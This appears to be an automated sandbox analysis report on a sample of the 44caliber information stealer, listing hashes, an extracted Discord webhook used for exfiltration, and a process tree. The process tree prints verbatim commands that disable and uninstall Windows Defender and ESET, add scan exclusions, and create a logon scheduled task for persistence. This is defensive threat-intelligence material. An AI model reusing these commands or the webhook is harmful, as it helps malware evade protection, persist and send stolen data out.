Analysis
-
max time kernel
0s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2023 08:14
Static task
static1
Behavioral task
behavioral1
Sample
2eb2782cc346b73b7180e3e9a220041c.exe
Resource
win7-20231215-en
General
-
Target
2eb2782cc346b73b7180e3e9a220041c.exe
-
Size
9.3MB
-
MD5
2eb2782cc346b73b7180e3e9a220041c
-
SHA1
b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968
-
SHA256
3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425
-
SHA512
5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9
-
SSDEEP
196608:DzB+082zIZNrOYyPugEl4ZXni32eZ3WU5QR6kj09F1lThXBhc+YX7:DzB+GeN/y2jl4N+2KWVR6u0P1l3Sj
Malware Config
Extracted
44caliber
https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5
Signatures
-
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4828 icacls.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 freegeoip.app 20 freegeoip.app -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4392 schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"1⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"2⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"3⤵PID:8
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit4⤵PID:2224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵PID:3948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit4⤵PID:4792
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'5⤵
- Creates scheduled task(s)
PID:4392
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:4608
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\Insidious.exe"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"3⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"2⤵PID:3284
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe" org.develnext.jphp.ext.javafx.FXLauncher3⤵PID:4656
-
C:\Windows\system32\icacls.exeC:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M4⤵
- Modifies file permissions
PID:4828
-
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit1⤵PID:4144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:2388
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit1⤵PID:3684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:4496
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46B
MD50ffdc92ef0ef1d2113843a803410bfe5
SHA1494059e076659f0d10be0193a76d84620beec10e
SHA256381d528e3b5bed035139b91470d5e30ad6a2621d1982f89af3582209c0964e9d
SHA512e2879c4d8ee392cb5d41164d1b877fb7c305903c4b55ae8477b1929394c27fc4252ae10122df4420d8bd7858a80f3686b7f41c5f0bb8c2e22060e939999b160b
-
Filesize
129KB
MD5be4d0f0cfaad92c6649c63642a9c77e8
SHA1f7871532344b41d2e5cd01e4ab5f9b5e8677feb0
SHA256a079dc22c2933cd886b6729f025e232241e6c55e38f516bea35a8d9fd2ad57ca
SHA5120d3aa59800f0741ff6260bb71d9a9a69c8c914617f6f5f782641b34adb31f1662096945fabc2499f00cd5f3865eb7fe645f102cfb46e3b6854b4e3421f61e6de
-
Filesize
130KB
MD5b8c480cd3985510ec432aeab8ce6145d
SHA1ea54074e1dfc8367e665c774d7e40ab9bc40595c
SHA256064b6bc2393b7c540eea814fc827b76ea26f33e7bedd31b0688f49b1c85c0543
SHA512b0e582aa1554f5288e3d5ab5562d42352f202435238ece8f43afb698e0547fdbac527db5f13e93d5d0573a7927531ff973afae41c2db2ed94c7d008fbbc37718
-
Filesize
165KB
MD56755103311086ab6ba3856f36da88f06
SHA13def0b8c44210e6d47633d17881e93dae140b75a
SHA25628d161759cb578592da0ac817903313c20e575a42c2a4a4b7d6070bb09ee17d9
SHA5126cf9907a75a5ca373729561e4eabd7c988cc010dec0904d6b33f55f0e357689af2b90c51acc92b458ce2a6e7c88ed7b6844a171797c4726a4d0ced80ea62c56f
-
Filesize
129KB
MD5567aecb41e70d64a97efd4c98f3dca43
SHA13434762ce941663a4a2d4e5002e3f67f244b7b35
SHA2560b8f9d996066ce69912ba076ddfe7537f249d64cd5cf52d2166c1026c946123a
SHA5120b41ae64fc1a8bd5f598816971f471a705962241065310e7baa7b4a2033c4acd4990b41e644da5b350dab417482a932d545c0ffb3cc964f44d889e03e995f9bc
-
Filesize
641KB
MD51cc25f4b4a4bd06a6330c22bee47e69c
SHA1ea10bc7220c33d475c01ec89d03731a4c77266b5
SHA25673d968ccce0ed14a99291e3c6a5c008ad76a9d2e8ebaaa563a876e4479faf7f6
SHA5125705a2c47c0b91ca755b3f50201085c4a79b2cc3d30dfe88498e937c05d6ae328192efeaa3a3b41b83877cab07c9205ac01bd7b3874b12fe6637fd3b7fea4acc
-
Filesize
129KB
MD53912ef7e98b0da819b9d3c222fda5cba
SHA19305d9f3efe544fa7bf534071139d6ca661077e8
SHA256c07ed29acb67f5c948a76e2fe6f2e353a43e35d28190f6c3699105c5d3ded9fc
SHA51211c39febfcb7fc0d41a0640fa11d482a13b4df48a07130d0c41b1cb89596718e36e30e63a9a3829733e587fe0ae51bcf3368e8e9b3f40003b832ec4a4b20eba6
-
Filesize
192KB
MD5bf6d69f4e699dbd688b667e92c6fe22d
SHA13df135b69502bd1e80a9b7ae0182d3d9194b8a6b
SHA256c4c2239728e40fbf9670e228cd756eadf11eab517755a7cd40da1c511935c234
SHA5126f60148a7290ceca8f5d25c5c00082f246c197adf4a673f4e69c26da42181b92bc49ae1b7f5d0e26a13b27a015b4a8a0d7e60a4a11f2e50e0e467e0cd21bd73c
-
Filesize
403KB
MD5cc97c0d8c46403d0f068f413e0d37bca
SHA1573255c8074c816d3d947129788f1ff49cdd0c8e
SHA25607904e1c1c8a8abbebae73c50387ae1bcb872c96a3d1fffe802448b11211297f
SHA512ae961a8e93da5722472f65d2f9f94a588029f195b6b34425a6f81ff2760ff7695a585633f944e04e5e18c6a024081ec5fb6e8b96e8ac8b1f1be0a41fed418bfa
-
Filesize
348KB
MD5d130b2d803cc66fe7e879e5222f5e6b3
SHA13bbf23a22fbc5c073e038441b82c8f4bcc3a6d6a
SHA2560604615f2013f8872ff43322226e7ca64f8ae9952596ea81f080c0d03444d5cf
SHA5123a154f9e8affaf1770f221745a07d91e24ce8a39ee4ad9a53a9da0156de3640a3d293978a7def2d1119676cae015c06d6d05b1ea5766e56ca0ba608dfb4e505c
-
Filesize
385KB
MD58c4db21c61676e09cef5b1fc6c9700c8
SHA1f2ee63303b2c4d0efbd6f344d361c604f8f23948
SHA25607b10e7cdab9b90d7d2f997e8b9c49bce692de120dbef8ff4b51990f5db02fd9
SHA512367ac06ad02d880ea97f61ac9f0abe40e88b1ed80c0e586dce83290d6f95ea0df0c291060a80b9c4dce323e8e187da7e9324f0ade651930e9e3cce6ebe03b8c0
-
Filesize
17KB
MD5f8f848e3792f47b86ac397288fa3f8d7
SHA17c4371e46bab5b65d893cacedd03eca1fa33a72b
SHA2565108a3c3f21488e613fc543c900fcc9874e10677621389573f049bd92fab6061
SHA512b2371a5109662b975a80839bdc14d1605e310425d56d42058ac5dbc69c7538dc208f175c5025b6646590e4e4826e286ab794cfc01b9d38fbb1db098ca1229c0a